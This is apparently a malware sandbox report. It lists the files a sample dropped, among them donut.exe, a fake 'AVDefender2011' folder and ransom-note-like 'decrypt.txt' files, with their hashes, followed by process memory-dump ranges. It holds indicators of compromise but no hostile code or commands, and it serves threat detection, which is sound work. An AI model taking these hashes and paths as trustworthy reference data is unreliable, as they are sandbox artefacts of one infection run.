                                                                  1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI49322\sqlite3.dll
                                                                  Filesize

                                                                  608KB

                                                                  MD5

                                                                  bd2819965b59f015ec4233be2c06f0c1

                                                                  SHA1

                                                                  cff965068f1659d77be6f4942ca1ada3575ca6e2

                                                                  SHA256

                                                                  ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec

                                                                  SHA512

                                                                  f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI49322\unicodedata.pyd
                                                                  Filesize

                                                                  287KB

                                                                  MD5

                                                                  7a462a10aa1495cef8bfca406fb3637e

                                                                  SHA1

                                                                  6dcbd46198b89ef3007c76deb42ab10ba4c4cf40

                                                                  SHA256

                                                                  459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0

                                                                  SHA512

                                                                  d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezfyp1ln.seg.ps1
                                                                  Filesize

                                                                  60B

                                                                  MD5

                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                  SHA1

                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                  SHA256

                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                  SHA512

                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\donut.exe
                                                                  Filesize

                                                                  58KB

                                                                  MD5

                                                                  e76eca2f7d0450c84417a8ac242b424c

                                                                  SHA1

                                                                  abdb8a43a6d0bf9c60d9cd4223da787c33b341bb

                                                                  SHA256

                                                                  2f40011df85d75556816ac944d805b6313da44c73c80778af62be5727c005811

                                                                  SHA512

                                                                  242f6e558fbe5dff48f9ca4776ffe58042741c9569d6b26ef45029dd035b1c61f5ef871d5d1645326fd816a8ef31baf1edac0e55cc4612e6d374bf834c144fa6

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\yababi.exe
                                                                  Filesize

                                                                  6.0MB

                                                                  MD5

                                                                  ca710591543797b655a51b04585e2d58

                                                                  SHA1

                                                                  d1fb89147c58cb9f73f2e827fd4e6d41940076df

                                                                  SHA256

                                                                  ec9d392b8a8705a0a510a47e1a4ee3b8785dc87bb2b89b5d6c5eee81e92c11f2

                                                                  SHA512

                                                                  115ff641cb3b0888c3075decb603003a651dbb04bce79e4be6d4cad09ad4fe03cca9c7327e26a48a7fd8ed42e0fba2c283bc925d4e50635d3a0a0c6c727146c0

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Local\Temp\{53F3CD5E-6122-4660-9698-225A3940CDB8} - OProcSessId.dat.fun
                                                                  Filesize

                                                                  16B

                                                                  MD5

                                                                  cfdae8214d34112dbee6587664059558

                                                                  SHA1

                                                                  f649f45d08c46572a9a50476478ddaef7e964353

                                                                  SHA256

                                                                  33088cb514406f31e3d96a92c03294121ee9f24e176f7062625c2b36bee7a325

                                                                  SHA512

                                                                  c260f2c223ecbf233051ac1d6a1548ad188a2777085e9d43b02da41b291ff258e4c506f99636150847aa24918c7bbb703652fef2fe55b3f50f85b5bd8dd5f6e3

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Roaming\AVDefender2011\AVDefender2011.ini
                                                                  Filesize

                                                                  346B

                                                                  MD5

                                                                  e6b48ac44b99528968036572f3ec159a

                                                                  SHA1

                                                                  1e84f31f2c60adffe71f2a7d7d63089f51bd5092

                                                                  SHA256

                                                                  f1d7fb3d264d8dc19936891c884e9c0a6d4c16523dfc0eaaed216003585fc0c4

                                                                  SHA512

                                                                  a7955eec5293adda97072294771b00511c4b608abbec94e023b4697d4d7a444a33e390b1f1633091cd6805c62c0f63c27cc3842fe9ab8e6ba7358f1b9cd82b54

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Roaming\AVDefender2011\history.dat
                                                                  Filesize

                                                                  38B

                                                                  MD5

                                                                  286df75e0b6c034763abf441a33b4773

                                                                  SHA1

                                                                  d1b7a01f8515ea50a6c890ecca2c56de19663c0e

                                                                  SHA256

                                                                  4fface4daa5eb6c052ba35aa7a777a81b07dadc730670913355580d5bc357fdb

                                                                  SHA512

                                                                  fb5e6226acba6fb9007f4010e43a0698189a3eb3e015fbe605343b25884856521ee6471773ddb09141a96eb95e6208aa70e03b71d36f87ee14740b605019d723

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Roaming\AVDefender2011\vlc.dat
                                                                  Filesize

                                                                  4KB

                                                                  MD5

                                                                  ebbb46f68341d48f7fc6dd4ec97c34b1

                                                                  SHA1

                                                                  b73c42cf2fb7bc0b57eef456132a9947ff5cbbc6

                                                                  SHA256

                                                                  9fbcee4f613053f6d08b316cceeb2b1fb10e6ad6558605ee5d827a1f1f63730f

                                                                  SHA512

                                                                  e5e55685ae871e6075364f3da447b0b0264bad087aa52df6a42550cf232dfc0500a43451b4b8ac853b2499505a063e440b4c5f4f65fb540c7316c4ba7767a56f

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Roaming\ppbydueq\InstallParams.lst
                                                                  Filesize

                                                                  256B

                                                                  MD5

                                                                  c7977c4a27597b04139e5070e80332ad

                                                                  SHA1

                                                                  8ccc589fcaf897c30b9a116c2a5147affcaedccf

                                                                  SHA256

                                                                  fbff74a38cc91aa42a520a4ab6631995822e8b0d6e84b2ec33d2448093b32e21

                                                                  SHA512

                                                                  f851bf0dd017f7b47fa530f24c2d782c50303adc12b9a836bad356523192a77cdf3c8762835297190b97088e2a7ac3388ff7ca1c26e6b96776ec6408c982df0f

                                                                  Download Submit

                                                                • C:\Users\Admin\AppData\Roaming\ppbydueq\ubhyrv.exe
                                                                  Filesize

                                                                  912KB

                                                                  MD5

                                                                  e78afab1c48e3db4f6eeac83c5d7491f

                                                                  SHA1

                                                                  d117e6198ac31a750f9cdc01e78763e73186d65c

                                                                  SHA256

                                                                  854b311a73b55e36ea916da96cc497045c2767e532897cbee77c3bc0ed809b07

                                                                  SHA512

                                                                  4f330db371284a99ace35f6e3f8d30c1657269113d8778110c7316ad91d045109cc16d925073c31839cdafe9a8f8d50ef9a638182fec08ce223b3cf9c5b20cbb

                                                                  Download Submit

                                                                • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\decrypt.txt
                                                                  Filesize

                                                                  400B

                                                                  MD5

                                                                  a48b26d25e0eeb2aabd5c0c464192227

                                                                  SHA1

                                                                  f914ddab2c641652252d7bd2e9f2156dc735461d

                                                                  SHA256

                                                                  62add576052a0a8317b604e26ff0f539677c74d0faf670f4511e3361f1e4a300

                                                                  SHA512

                                                                  9421051d6fb05a36e0bf30af52801a51fc8265e358c4a14690bb674645c4b1941181995b4a51dc91e27f05172246eb175d3b98cde745336c988187a5448ee8f3

                                                                  Download Submit

                                                                • C:\Users\Admin\Music\decrypt.txt.fun
                                                                  Filesize

                                                                  416B

                                                                  MD5

                                                                  69bd989a24aefc9e2552dcfefa023a75

                                                                  SHA1

                                                                  9b633cb243405aa81c987a2c5f3f17f8784eae4c

                                                                  SHA256

                                                                  b253bae8b3a13caf5a6ff300affaac673ac4d2bc570ca3fb833f74bf87d8821d

                                                                  SHA512

                                                                  01dfb6d12cd98a5b298867cc0e54522d2cb64b7e48f98bf21c3858ecee79604a07a2cb21a32aa7b0b736376857fe5bc5faa2ec21b0e4e971dee0f30f26fcdf94

                                                                  Download Submit

                                                                • memory/944-371-0x0000000000400000-0x00000000005E8000-memory.dmp

                                                                  Filesize

                                                                  1.9MB

                                                                  Download

                                                                • memory/944-118-0x0000000000400000-0x00000000005E8000-memory.dmp

                                                                  Filesize

                                                                  1.9MB

                                                                  Download

                                                                • memory/1684-168-0x00007FFD4D510000-0x00007FFD4D520000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1684-172-0x00007FFD4D510000-0x00007FFD4D520000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1684-204-0x00007FFD4B1B0000-0x00007FFD4B1C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1684-170-0x00007FFD4D510000-0x00007FFD4D520000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1684-171-0x00007FFD4D510000-0x00007FFD4D520000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1684-169-0x00007FFD4D510000-0x00007FFD4D520000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1684-192-0x00007FFD4B1B0000-0x00007FFD4B1C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                  Download

                                                                • memory/1908-117-0x00007FFD6BB60000-0x00007FFD6BFCE000-memory.dmp

                                                                  Filesize

                                                                  4.4MB

                                                                  Download

                                                                • memory/1908-559-0x00007FFD7DAA0000-0x00007FFD7DAB9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                  Download

                                                                • memory/1908-188-0x00007FFD839D0000-0x00007FFD839E9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                  Download

                                                                • memory/1908-190-0x00007FFD7E4D0000-0x00007FFD7E4EF000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                  Download

                                                                • memory/1908-191-0x00007FFD6CFC0000-0x00007FFD6D131000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                  Download

                                                                • memory/1908-205-0x00007FFD7DAA0000-0x00007FFD7DAB9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                  Download

                                                                • memory/1908-206-0x00007FFD82820000-0x00007FFD8282D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                  Download

                                                                • memory/1908-154-0x00007FFD87E00000-0x00007FFD87E0F000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                  Download

                                                                • memory/1908-153-0x00007FFD82530000-0x00007FFD82554000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                  Download

                                                                • memory/1908-207-0x00007FFD7D9A0000-0x00007FFD7D9CE000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                  Download

                                                                • memory/1908-210-0x000002A63C970000-0x000002A63CCE5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                  Download

                                                                • memory/1908-215-0x00007FFD7D980000-0x00007FFD7D994000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                  Download

                                                                • memory/1908-230-0x00007FFD6BB60000-0x00007FFD6BFCE000-memory.dmp

                                                                  Filesize

                                                                  4.4MB

                                                                  Download

                                                                • memory/1908-227-0x00007FFD63E20000-0x00007FFD63F38000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                  Download

                                                                • memory/1908-553-0x00007FFD82530000-0x00007FFD82554000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                  Download

                                                                • memory/1908-554-0x00007FFD87E00000-0x00007FFD87E0F000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                  Download

                                                                • memory/1908-222-0x00007FFD81930000-0x00007FFD8193D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                  Download

                                                                • memory/1908-555-0x00007FFD7E8D0000-0x00007FFD7E8FD000-memory.dmp

                                                                  Filesize

                                                                  180KB

                                                                  Download

                                                                • memory/1908-211-0x00007FFD64F20000-0x00007FFD64FD8000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                  Download

                                                                • memory/1908-286-0x00007FFD82530000-0x00007FFD82554000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                  Download

                                                                • memory/1908-556-0x00007FFD839D0000-0x00007FFD839E9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                  Download

                                                                • memory/1908-557-0x00007FFD7E4D0000-0x00007FFD7E4EF000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                  Download

                                                                • memory/1908-558-0x00007FFD6CFC0000-0x00007FFD6D131000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                  Download

                                                                • memory/1908-187-0x00007FFD7E8D0000-0x00007FFD7E8FD000-memory.dmp

                                                                  Filesize

                                                                  180KB

                                                                  Download

                                                                • memory/1908-333-0x00007FFD7E4D0000-0x00007FFD7E4EF000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                  Download

                                                                • memory/1908-208-0x00007FFD64BA0000-0x00007FFD64F15000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                  Download

                                                                • memory/1908-560-0x00007FFD82820000-0x00007FFD8282D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                  Download

                                                                • memory/1908-561-0x00007FFD7D9A0000-0x00007FFD7D9CE000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                  Download

                                                                • memory/1908-568-0x00007FFD64BA0000-0x00007FFD64F15000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                  Download

                                                                • memory/1908-569-0x00007FFD7D980000-0x00007FFD7D994000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                  Download

                                                                • memory/1908-570-0x00007FFD81930000-0x00007FFD8193D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                  Download

                                                                • memory/1908-571-0x00007FFD63E20000-0x00007FFD63F38000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                  Download

                                                                • memory/1908-445-0x00007FFD64F20000-0x00007FFD64FD8000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                  Download

                                                                • memory/1908-567-0x00007FFD64F20000-0x00007FFD64FD8000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                  Download

                                                                • memory/1908-395-0x00007FFD6CFC0000-0x00007FFD6D131000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                  Download

                                                                • memory/1908-525-0x00007FFD6CFC0000-0x00007FFD6D131000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                  Download

                                                                • memory/1908-552-0x00007FFD6BB60000-0x00007FFD6BFCE000-memory.dmp

                                                                  Filesize

                                                                  4.4MB

                                                                  Download

                                                                • memory/1908-416-0x00007FFD64BA0000-0x00007FFD64F15000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                  Download

                                                                • memory/1908-417-0x000002A63C970000-0x000002A63CCE5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                  Download

                                                                • memory/1908-415-0x00007FFD7D9A0000-0x00007FFD7D9CE000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                  Download

                                                                • memory/1908-414-0x00007FFD7DAA0000-0x00007FFD7DAB9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                  Download

                                                                • memory/1908-520-0x00007FFD82530000-0x00007FFD82554000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                  Download

                                                                • memory/1908-524-0x00007FFD7E4D0000-0x00007FFD7E4EF000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                  Download

                                                                • memory/1908-519-0x00007FFD6BB60000-0x00007FFD6BFCE000-memory.dmp

                                                                  Filesize

                                                                  4.4MB

                                                                  Download

                                                                • memory/2008-120-0x000000001B4B0000-0x000000001B97E000-memory.dmp

                                                                  Filesize

                                                                  4.8MB

                                                                  Download

                                                                • memory/2008-124-0x000000001BA20000-0x000000001BABC000-memory.dmp

                                                                  Filesize

                                                                  624KB

                                                                  Download

                                                                • memory/2008-157-0x0000000000990000-0x0000000000998000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                  Download

                                                                • memory/2664-25-0x00000000739F0000-0x00000000741A1000-memory.dmp

                                                                  Filesize

                                                                  7.7MB

                                                                  Download

                                                                • memory/2664-3-0x00000000739F0000-0x00000000741A1000-memory.dmp

                                                                  Filesize

                                                                  7.7MB

                                                                  Download

                                                                • memory/2664-1-0x00000000034B0000-0x00000000034E6000-memory.dmp

                                                                  Filesize

                                                                  216KB

                                                                  Download

                                                                • memory/2664-2-0x0000000005D30000-0x000000000635A000-memory.dmp

                                                                  Filesize

                                                                  6.2MB

                                                                  Download

                                                                • memory/2664-22-0x0000000007D90000-0x0000000007E22000-memory.dmp

                                                                  Filesize

                                                                  584KB

                                                                  Download

                                                                • memory/2664-4-0x00000000739F0000-0x00000000741A1000-memory.dmp

                                                                  Filesize

                                                                  7.7MB

                                                                  Download

                                                                • memory/2664-5-0x0000000005CF0000-0x0000000005D12000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                  Download

                                                                • memory/2664-6-0x00000000063D0000-0x0000000006436000-memory.dmp

                                                                  Filesize

                                                                  408KB

                                                                  Download

                                                                • memory/2664-7-0x0000000006440000-0x00000000064A6000-memory.dmp

                                                                  Filesize

                                                                  408KB

                                                                  Download

                                                                • memory/2664-16-0x00000000064B0000-0x0000000006807000-memory.dmp

                                                                  Filesize

                                                                  3.3MB

                                                                  Download

                                                                • memory/2664-17-0x0000000006980000-0x000000000699E000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                  Download

                                                                • memory/2664-18-0x00000000069C0000-0x0000000006A0C000-memory.dmp

                                                                  Filesize

                                                                  304KB

                                                                  Download

                                                                • memory/2664-19-0x0000000008020000-0x000000000869A000-memory.dmp

                                                                  Filesize

                                                                  6.5MB

                                                                  Download

                                                                • memory/2664-20-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                  Download

                                                                • memory/2664-21-0x0000000008C50000-0x00000000091F6000-memory.dmp

                                                                  Filesize

                                                                  5.6MB

                                                                  Download

                                                                • memory/2664-0-0x00000000739FE000-0x00000000739FF000-memory.dmp

                                                                  Filesize

                                                                  4KB

                                                                  Download

                                                                • memory/3108-123-0x000000001B6B0000-0x000000001B756000-memory.dmp

                                                                  Filesize

                                                                  664KB

                                                                  Download

                                                                • memory/3108-158-0x000000001C310000-0x000000001C35C000-memory.dmp

                                                                  Filesize

                                                                  304KB

                                                                  Download

                                                                • memory/3128-2984-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-2962-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-2989-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-707-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-2986-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-788-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-2124-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-3018-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-369-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-2953-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-1282-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-1650-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-2941-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-3029-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3128-3035-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3380-790-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3380-396-0x0000000000400000-0x00000000005D1000-memory.dmp

                                                                  Filesize

                                                                  1.8MB

                                                                  Download

                                                                • memory/3512-262-0x000001387A670000-0x000001387A692000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                  Download

                                                                • memory/3840-372-0x0000000007E20000-0x0000000007EB6000-memory.dmp

                                                                  Filesize

                                                                  600KB

                                                                  Download

                                                                • memory/3840-419-0x0000000007DA0000-0x0000000007DB5000-memory.dmp

                                                                  Filesize

                                                                  84KB

                                                                  Download

                                                                • memory/3840-420-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

                                                                  Filesize

                                                                  104KB

                                                                  Download

                                                                • memory/3840-164-0x0000000006250000-0x00000000065A7000-memory.dmp

                                                                  Filesize

                                                                  3.3MB

                                                                  Download

                                                                • memory/3840-418-0x0000000007D90000-0x0000000007D9E000-memory.dmp

                                                                  Filesize

                                                                  56KB

                                                                  Download

                                                                • memory/3840-358-0x0000000007BC0000-0x0000000007BCA000-memory.dmp

                                                                  Filesize

                                                                  40KB

                                                                  Download

                                                                • memory/3840-311-0x0000000007830000-0x00000000078D4000-memory.dmp

                                                                  Filesize

                                                                  656KB

                                                                  Download

                                                                • memory/3840-300-0x0000000074CA0000-0x0000000074CEC000-memory.dmp

                                                                  Filesize

                                                                  304KB

                                                                  Download

                                                                • memory/3840-246-0x0000000006D60000-0x0000000006DAC000-memory.dmp

                                                                  Filesize

                                                                  304KB

                                                                  Download

                                                                • memory/3840-442-0x0000000007DE0000-0x0000000007DE8000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                  Download

                                                                • memory/3840-299-0x00000000077E0000-0x0000000007814000-memory.dmp

                                                                  Filesize

                                                                  208KB

                                                                  Download

                                                                • memory/3840-386-0x0000000007D50000-0x0000000007D61000-memory.dmp

                                                                  Filesize

                                                                  68KB

                                                                  Download

                                                                • memory/3840-310-0x0000000006DD0000-0x0000000006DEE000-memory.dmp

                                                                  Filesize

                                                                  120KB

                                                                  Download